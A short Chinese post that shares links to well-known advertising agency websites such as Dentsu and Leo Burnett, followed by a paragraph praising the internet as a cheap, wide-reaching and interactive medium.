最近因工作需要在找一些广告，也发一些优秀的广告公司网站，希望能帮到大家，一.4A广告 电通 http://www.dentsu.com.cn/index.htm李奥・贝纳 http://www.leoburnett.com/

网络作为新兴的技术，以其投入低、传播广、容量大、服务期长、即时性和交互性等突出特点，飞速改变着我们的生活，不管是作为第四媒体，还是作为降低企业运营成本以提高企业竞争力的工具，它都有极好的表现。未来，将是互联网的时代，这一点已基本形成共识。